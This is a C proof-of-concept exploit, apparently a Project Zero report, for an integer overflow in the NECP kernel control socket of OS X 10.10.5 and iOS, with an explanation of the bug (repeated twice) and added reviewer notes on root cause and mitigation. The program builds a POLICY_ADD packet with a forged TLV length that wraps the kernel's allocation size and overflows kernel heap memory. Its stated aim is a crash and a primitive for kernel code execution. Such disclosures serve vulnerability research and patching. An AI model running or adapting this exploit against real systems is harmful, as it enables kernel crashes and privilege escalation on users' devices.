/* Source: https://code.google.com/p/google-security-research/issues/detail?id=543 NKE control sockets are documented here: https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/control/control.html By default there are actually a bunch of these providers; they are however all only accessible to root. Nevertheless, on iOS and now (thanks to SIP) OS X this is a real security boundary. necp control sockets are implemented in necp.c. The messages themselves consist of a simple header followed by type-length-value entries. The type field is a single byte and the length is a size_t (ie 8 bytes.) by sending a packet with an id of NECP_PACKET_TYPE_POLICY_ADD we can reach the following loop: // Read policy conditions for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0) { conditions_array_size += (sizeof(u_int8_t) + sizeof(size_t) + condition_size); } } The necp_packet_{find|get}_* functions cope gracefully if the final tlv is waaay bigger than the actual message (like 2^64-1 ;) ) This means that we can overflow conditions_array_size to anything we want very easily.
In this PoC the packet contains three policy conditions: one of length 1; one of length 1024 and one of length 2^64-1051; later conditions_array_size is used as the size of a memory allocation: MALLOC(conditions_array, u_int8_t *, conditions_array_size, M_NECP, M_WAITOK); There is then a memory copying loop operating on the undersized array: conditions_array_cursor = 0; for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { u_int8_t condition_type = NECP_TLV_POLICY_CONDITION; size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0 && condition_size <= (conditions_array_size - conditions_array_cursor)) { <-- (a) // Add type memcpy((conditions_array + conditions_array_cursor), &condition_type, sizeof(condition_type)); conditions_array_cursor += sizeof(condition_type); // Add length memcpy((conditions_array + conditions_array_cursor), &condition_size, sizeof(condition_size)); conditions_array_cursor += sizeof(condition_size); // Add value necp_packet_get_tlv_at_offset(packet, cursor, condition_size, (conditions_array + conditions_array_cursor), NULL);<-- (b) There is actually an extra check at (a); this is why we need the first policy_condition of size one (so that the second time through the loop (conditions_array_size[1] - conditions_array_cursor[9]) will underflow allowing us to reach the necp_packet_get_tlv_at_offset call which will then copy the second 1024 byte policy. By constructing the policy like this we can choose both the allocation size and the overflow amount, a nice primitive for an iOS kernel exploit :) this will crash in weird ways due to the rather small overflow; you can mess with the PoC to make it crash more obviously!
But just run this PoC a bunch of times and you'll crash :) Tested on MacBookAir 5,2 w/ OS X 10.10.5 (14F27) */
// ianbeer
/* iOS and OS X kernel code execution due to integer overflow in NECP system control socket packet parsing NKE control sockets are documented here: https://developer.apple.com/library/mac/documentation/Darwin/Conceptual/NKEConceptual/control/control.html By default there are actually a bunch of these providers; they are however all only accessible to root. Nevertheless, on iOS and now (thanks to SIP) OS X this is a real security boundary. necp control sockets are implemented in necp.c. The messages themselves consist of a simple header followed by type-length-value entries. The type field is a single byte and the length is a size_t (ie 8 bytes.) by sending a packet with an id of NECP_PACKET_TYPE_POLICY_ADD we can reach the following loop: // Read policy conditions for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0) { conditions_array_size += (sizeof(u_int8_t) + sizeof(size_t) + condition_size); } } The necp_packet_{find|get}_* functions cope gracefully if the final tlv is waaay bigger than the actual message (like 2^64-1 ;) ) This means that we can overflow conditions_array_size to anything we want very easily.
In this PoC the packet contains three policy conditions: one of length 1; one of length 1024 and one of length 2^64-1051; later conditions_array_size is used as the size of a memory allocation: MALLOC(conditions_array, u_int8_t *, conditions_array_size, M_NECP, M_WAITOK); There is then a memory copying loop operating on the undersized array: conditions_array_cursor = 0; for (cursor = necp_packet_find_tlv(packet, offset, NECP_TLV_POLICY_CONDITION, &error, 0); cursor >= 0; cursor = necp_packet_find_tlv(packet, cursor, NECP_TLV_POLICY_CONDITION, &error, 1)) { u_int8_t condition_type = NECP_TLV_POLICY_CONDITION; size_t condition_size = 0; necp_packet_get_tlv_at_offset(packet, cursor, 0, NULL, &condition_size); if (condition_size > 0 && condition_size <= (conditions_array_size - conditions_array_cursor)) { <-- (a) // Add type memcpy((conditions_array + conditions_array_cursor), &condition_type, sizeof(condition_type)); conditions_array_cursor += sizeof(condition_type); // Add length memcpy((conditions_array + conditions_array_cursor), &condition_size, sizeof(condition_size)); conditions_array_cursor += sizeof(condition_size); // Add value necp_packet_get_tlv_at_offset(packet, cursor, condition_size, (conditions_array + conditions_array_cursor), NULL);<-- (b) There is actually an extra check at (a); this is why we need the first policy_condition of size one (so that the second time through the loop (conditions_array_size[1] - conditions_array_cursor[9]) will underflow allowing us to reach the necp_packet_get_tlv_at_offset call which will then copy the second 1024 byte policy. By constructing the policy like this we can choose both the allocation size and the overflow amount, a nice primitive for an iOS kernel exploit :) this will crash in weird ways due to the rather small overflow; you can mess with the PoC to make it crash more obviously!
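But just run this PoC a bunch of times and you'll crash :) Tested on MacBookAir 5,2 w/ OS X 10.10.5 (14F27) */

/*
 * Reviewer notes (defensive reading of the analysis above):
 *  - Root cause: the kernel loop quoted above adds attacker-supplied size_t
 *    TLV lengths into conditions_array_size with no check for wraparound, and
 *    the TLV helpers accept a declared length far larger than the remaining
 *    packet. The wrapped total then sizes the allocation that the second loop
 *    copies into.
 *  - Mitigation: bound each TLV length by the bytes remaining in the packet
 *    before using it, and accumulate the array size with an overflow-checked
 *    addition that fails the request on wraparound.
 *  - Exposure: the control socket is root-only (see above), so the boundary
 *    crossed is root -> kernel; that matters where SIP or the iOS sandbox
 *    treats root as untrusted.
 */

#include <errno.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/kern_control.h>
#include <sys/sys_domain.h>
#include <net/if.h>
#include <netinet/in_var.h>
#include <netinet6/nd6.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Name of the kernel control this program connects to. */
#define CONTROL_NAME "com.apple.net.necp_control"

/*
 * Open a PF_SYSTEM control socket and connect it to CONTROL_NAME.
 *
 * Returns the connected descriptor, or -1 on failure (a socket that was
 * opened before the failure is closed first). Failures are reported on
 * stdout via printf. Per the notes above, this control is only reachable
 * as root.
 */
int ctl_open(void) {
  int sock;
  int error = 0;
  struct ctl_info kernctl_info;
  struct sockaddr_ctl kernctl_addr;

  sock = socket(PF_SYSTEM, SOCK_DGRAM, SYSPROTO_CONTROL);
  if (sock < 0) {
    /* error stays 0 here, so the cleanup below just returns -1 */
    printf("failed to open a SYSPROTO_CONTROL socket: %s", strerror(errno));
    goto done;
  }

  /* Resolve the control name to its numeric id. */
  memset(&kernctl_info, 0, sizeof(kernctl_info));
  strlcpy(kernctl_info.ctl_name, CONTROL_NAME, sizeof(kernctl_info.ctl_name));
  error = ioctl(sock, CTLIOCGINFO, &kernctl_info);
  if (error) {
    printf("Failed to get the control info for control named \"%s\": %s\n", CONTROL_NAME, strerror(errno));
    goto done;
  }

  memset(&kernctl_addr, 0, sizeof(kernctl_addr));
  kernctl_addr.sc_len = sizeof(kernctl_addr);
  kernctl_addr.sc_family = AF_SYSTEM;
  kernctl_addr.ss_sysaddr = AF_SYS_CONTROL;
  kernctl_addr.sc_id = kernctl_info.ctl_id;
  kernctl_addr.sc_unit = 0;
  error = connect(sock, (struct sockaddr *)&kernctl_addr, sizeof(kernctl_addr));
  if (error) {
    printf("Failed to connect to the control socket: %s", strerror(errno));
    goto done;
  }

done:
  if (error && sock >= 0) {
    close(sock);
    sock = -1;
  }
  return sock;
}

/*
 * Fixed header that precedes the TLV list in a NECP control message.
 * NOTE(review): no packing attribute, so the compiler places message_id at
 * offset 4 (two padding bytes after flags) and sizeof is 8; main() relies on
 * that via (hdr + 1) — confirm it matches the kernel's header layout.
 */
struct necp_packet_header {
  uint8_t packet_type;   /* 1 == POLICY_ADD in main() below */
  uint8_t flags;
  uint32_t message_id;
};

/*
 * Append one TLV at buf: one type byte, an 8-byte size_t length, then len
 * bytes copied from val. Returns the position just past the entry.
 * NOTE(review): the length is stored through a size_t* cast at buf+1, an
 * unaligned aliasing store; memcpy would be the well-defined way to write it.
 */
uint8_t* add_real_tlv(uint8_t* buf, uint8_t type, size_t len, uint8_t* val){
  *buf = type;
  *(( size_t*)(buf+1)) = len;
  memcpy(buf+9, val, len);
  return buf+9+len;
}

/*
 * Same layout as add_real_tlv, except the length field is set to len while
 * only real_len bytes of val are copied, so the declared length need not
 * match the bytes actually present. This produces the final entry whose
 * declared size exceeds the message (see the analysis above).
 */
uint8_t* add_fake_tlv(uint8_t* buf, uint8_t type, size_t len, uint8_t* val, size_t real_len){
  *buf = type;
  *(( size_t*)(buf+1)) = len;
  memcpy(buf+9, val, real_len);
  return buf+9+real_len;
}

/*
 * Build one POLICY_ADD message and send it to the NECP control socket.
 *
 * The three NECP_TLV_POLICY_CONDITION entries declare lengths 1, 1024 and
 * 2^64-1051; with 9 bytes of type+length overhead each, the kernel's running
 * total 10 + 1033 + (2^64-1042) wraps to 1 — the undersized allocation
 * described above.
 * NOTE(review): the malloc and send results are not checked, and the exit
 * status is 0 whether or not the send succeeded.
 */
int main(){
  int fd = ctl_open();
  if (fd < 0) {
    printf("failed to get control socket :(\n");
    return 1;
  }
  printf("got a control socket! %d\n", fd);

  size_t msg_size;
  uint8_t* msg = malloc(0x1000);
  memset(msg, 0, 0x1000);
  uint8_t* payload = malloc(0x1000);
  memset(payload, 'A', 0x1000);

  struct necp_packet_header* hdr = (struct necp_packet_header*) msg;
  hdr->packet_type = 1; // POLICY_ADD
  hdr->flags = 0;
  hdr->message_id = 0;

  /* TLVs start immediately after the fixed header. */
  uint8_t* buf = (uint8_t*)(hdr+1);

  uint32_t order = 0x41414141;
  buf = add_real_tlv(buf, 2, 4, &order); // NECP_TLV_POLICY_ORDER

  uint8_t policy = 1; // NECP_POLICY_RESULT_PASS
  buf = add_real_tlv(buf, 4, 1, &policy); // NECP_TLV_POLICY_RESULT

  buf = add_real_tlv(buf, 3, 1, payload); // NECP_TLV_POLICY_CONDITION
  buf = add_real_tlv(buf, 3, 1024, payload); // NECP_TLV_POLICY_CONDITION
  /* Declared length 2^64-1051, only 0x10 bytes actually present. */
  buf = add_fake_tlv(buf, 3, 0xffffffffffffffff-1050, payload, 0x10);

  msg_size = buf - msg;
  send(fd, msg, msg_size, 0);

  close(fd);
  return 0;
}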